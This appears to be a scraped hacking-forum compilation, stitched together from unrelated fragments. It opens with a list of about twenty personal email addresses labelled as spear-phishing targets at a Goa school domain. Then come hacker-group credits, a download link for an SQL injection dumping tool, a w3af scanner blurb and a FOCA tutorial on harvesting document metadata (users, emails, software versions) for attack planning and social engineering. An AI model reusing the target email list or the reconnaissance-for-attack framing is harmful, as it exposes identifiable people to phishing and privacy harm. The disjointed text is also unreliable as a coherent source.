PHP 4.4.8

Emails on dbhspgoa.edu.in (Spear phishing)
shaunakdsilva@yahoo.com
bhatimax@gmail.com
raunaq.ep@gmail.com
ikasrikant@hotmail.com
francisloves01@yahoo.com
rishiwrite@gmail.com
reuben.rebelo@rediff.com
mobypirate@hotmail.com
avesh.mahagaokar@hotmail.com
mak.man@live.com
clint.rb@rediffmail.com
principal@dbhspgoa.edu.in
jnmoses2000@yahoo.com
maheshverma124@gmail.com
reube.rebelo@rediff.com
yamuna.bepari@gmail.com
ethanferns4@gmail.com
greynomenezes@gmail.com
anthonydcosta95@gmail.com
edesa@yahoomail.com
dboscopanjim@yahoo.co.in

____________________________________________________________

0x3#~ Links
- http://hakipedia.com/index.php/SQL_Injection
- http://hex.online-toolz.com/tools/text-h...vertor.php
- https://www.owasp.org/index.php/XSS_Filt...heat_Sheet

0x4#~ Credits & Authors
Daisuke Dan - TheHackersBay
Penetration testing, Research Team

Have a nice day !

Simple SQLi Dumper v5.1 - Tool to find bugs, errors or vulnerabilities in MySQL database

SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database.

Functions
SQL Injection
Operation System Function
Dump Database
Extract Database Schema
Search Columns Name
Read File (read only)
Create File (read only)
Brute Table & Column
Download Simple SQLi Dumper v5.1 ===> http://rwinblog.comze.com/ssdp51/ssdp.pl

w3af - Open Source Web Application Security Scanner

w3af, is a Web Application Attack and Audit Framework. The w3af core and it’s plugins are fully written in python, it identifies more than 200 vulnerabilities and reduce your site’s overall risk exposure. Identify vulnerabilities like SQL Injection, Cross-Site Scripting, Guessable credentials, Unhandled application errors and PHP misconfigurations.

Changelog v1.6
Improved performance: your scans will run faster
Improved quality: 1300+ unittests are run after each change to make sure we don’t add any regressions
Now you’ll be able to easily integrate w3af into other projects with a simple import w3af
Better documentation

Download w3af ===> http://w3af.org/download

How to Hack: Extract Metadata from Websites Using FOCA

The preference for Linux as a hacking platform is well documented, and I have created a number of tutorials to train new hackers. Without being proficient in Linux, you can’t really call yourself a hacker. Sorry, that’s just how it is.
Every once in while, though, a hacking tool comes out for Windows that makes me stand up and take notice. For instance, Cain and Abel is an excellent tool for password cracking and MitM attacks and is only available on the Windows platform. I could name a few others, but only Havij, the excellent SQL injection tool, comes immediately to mind.
FOCA was released in 2009 and is now in version three. Although a Linux version is included in Kali, it is outdated. Let’s download the latest Windows version and use it here to perform some reconnaissance.
Good Reconnaissance Is Critical
FOCA is an excellent website reconnaissance tool with lots of interesting features and capabilities. Remember, before attacking any website or domain, it is critical to gather as much information as possible. From this information, you can determine the attack that is most likely to work against that site or network.
In this tutorial, we will looking at FOCA’s ability to find, download, and retrieve files from websites with the file’s metadata.
This metadata can give us insight into such information as the users (could be critical in cracking passwords), operating system (exploits are OS-specific), email addresses (possibly for social engineering), the software used (once again, exploits are OS-, and more and more often, application-specific), and if we are really lucky, passwords.
Step 1: Downlaod FOCA for Windows
First, let’s download FOCA Free 3.0 for Windows.
Step 2: Choose Where You Save Results
When you install FOCA, you will greeted with a screen like that below. The first task we need to do is to start a new project and then tell FOCA where we want to save our results.


I created a new directory at c:\foca and will save all my results there. Of course, you can save your results wherever is convenient for you, or use the default temp directory.
Step 3: Create a Project
In this tutorial, I will be starting with a project named after the information security training company, SANS, which is located at sans.org, and I will be saving my results to c:\foca.


Step 4: Getting the Metadata
Once I create my project, I can go to the object explorer to the far left and select Metadata. This enables us to pull the metadata from the files on the website that contain metadata. Files such as .pdf, .doc, .xls, etc. all contain metadata that could be useful in your hack of your target.
When you select metadata, you will pull up a screen like that below. In our case here, we will be searching sans.org for .doc files, so the syntax to be placed in the search window is:
site:sans.org filetype:doc
This will search the entire sans.org website, looking for .doc files. When I hit the Search button next to the window, it will begin to search and find all the .doc files at sans.org.


Of course, if you were searching for .pdf files or other filetypes, you would put in that filetype. You can also search for multiple filetypes by listing them after filetype, such as:
site:sans.org filetype:pdf,doc,xls
Step 5: Download the Files
Once FOCA is done retrieving a list of all the .doc files, we can then right-click on any file and download the file to our hard drive, download all the files, or analyze the metadata. I chose to download all the .doc files I found at sans.org.


Step 6: Collect & Analyze the Metadata
Now that we have downloaded all the .doc files, I chose to analyze all the metadata in them. Microsoft’s Office files collect significant amounts of data as they are being created and edited that we can then extract.
When we expand the Metadata folder in the object explorer, you can see that we have 156 .doc files and 2 .docx files.


The Types of Metadata Collected
Just beneath the Metadata documents folder is another folder titled, Metadata Summary. We can click on it and it reveals the type of metadata is has collected from the files. This metadata is broken into eight (8) categories:
Users
Folders
Printers
Software
Emails
Operating Systems
Passwords
Servers
Let’s take a look at Users first. When we click on users, we can see that FOCA has collected the names of every user that worked on those files.


When we click on Software, we can see the various editions of Microsoft Office that has been used, including five (5) users that created their documents with Office ’97 (hmm…wonder if there are any Office ’97 vulnerabilities still out there?).


We can also look for email addresses that are embedded in the documents as displayed below. Obviously, these folks are making themselves available to a social engineering attack.


We can also gather printer, folder, passwords, and servers from this metadata depending upon the documents we recover. All of this information can then be used to determine what is the best attack against this organization/website.